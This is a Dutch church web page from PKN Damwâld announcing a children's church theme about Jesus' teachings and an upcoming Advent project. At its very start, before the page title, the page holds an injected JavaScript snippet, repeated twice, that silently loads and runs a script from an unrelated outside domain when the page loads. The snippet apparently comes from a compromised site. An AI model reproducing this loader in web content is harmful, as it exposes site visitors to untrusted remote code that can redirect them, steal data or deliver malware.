;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Nieuw thema Bernetsjerke "Zo zit dat!" en aankondiging Adventproject - PKN Damwâld

Nieuw thema Bernetsjerke “Zo zit dat!” en aankondiging Adventproject

Gepubliceerd op: donderdag 9 november 2017

Het nieuwe thema van de Bernestsjerke is weer begonnen en heet “Zo zit dat.” In dit thema staat het leren centraal. Het gaat over wat Jezus ons wil leren over wat hij kan betekenen/doen voor anderen en ook voor ons. Daarnaast leren de kinderen ook bepaalde vaardigheden: bidden, mensen te vergeven, vriendelijk en gul te zijn. Op deze manier kunnen zij ook iets betekenen voor een ander.

In de onderbouw ontdekken de kinderen dat Jezus een echte verhalenverteller was. In elke les ontdekken ze dat Jezus zijn leerlingen iets leerde door de verhalen over de verloren zoon, de weduwe die alles gaf en de goede Samaritaan. Voor de kinderen wordt dit uitgevoerd met verhalen en toneelstukjes over een slaapfeest en een aap.

De middenbouw leert meer over Gods verhaal en hoe wij daarin een rol kunnen spelen. Dit gaan we doen met vier lessen over de Bergrede. De kinderen leren dat Jezus ons richtlijnen voor het leven heeft gegeven. We vinden aanwijzingen over het gebed, het geven aan anderen en leer je je geen zorgen meer te maken. Als je deze aanwijzingen volgt, laat jij je licht voor Jezus schijnen en zullen anderen zien dat je Hem volgt.

De bovenbouw onderzoekt de levensveranderende principes die Jezus heeft onderwezen tijdens zijn leven op aarde. We horen dat Jezus een blinde man genas en luisteren naar de gelijkenis over de goede Samaritaan. We horen het verhaal van een arme weduwe en over het wonder dat Lazarus opstond uit de dood.

Het themalied is: ‘Samen met Jezus’:

 

 

Op 26 november besteden we tijdens de Bernetsjerke aandacht aan het einde van het kerkelijk jaar. En die week daarna start het adventproject: “Laten we lezen….. over wie Ik ben!” Dit gaat over dat Jezus zelf zegt wie Hij is. Ook dit jaar besteden we hier vooraan in de kerk aandacht aan en maken de kinderen elke week een onderdeel van een attribuut dat op 1e kerstdag in de familiekerstochtenddienst getoond zal worden!